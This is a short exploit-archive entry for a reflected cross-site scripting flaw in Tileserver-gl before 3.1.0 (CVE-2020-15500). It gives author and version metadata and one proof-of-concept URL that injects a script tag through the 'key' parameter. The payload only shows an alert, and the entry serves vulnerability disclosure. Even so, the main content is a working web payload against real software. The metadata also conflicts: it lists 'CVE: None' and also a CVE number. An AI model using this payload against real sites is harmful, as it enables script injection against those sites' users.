Tileserver-gl 3.0.0 - 'key' Reflected Cross-Site Scripting (XSS)

2021-04-17
ID: 104243
CVE: None
Download vulnerable application: None
# Exploit Title: 
# Date: 15/04/2021
# Exploit Author: Akash Chathoth
# Vendor Homepage: http://tileserver.org/
# Software Link: https://github.com/maptiler/tileserver-gl
# Version: versions <3.1.0
# Tested on: 2.6.0
# CVE: 2020-15500

Exploit : http://example.com/?key="><script>alert(document.domain)</script>
1-4-2 (www01)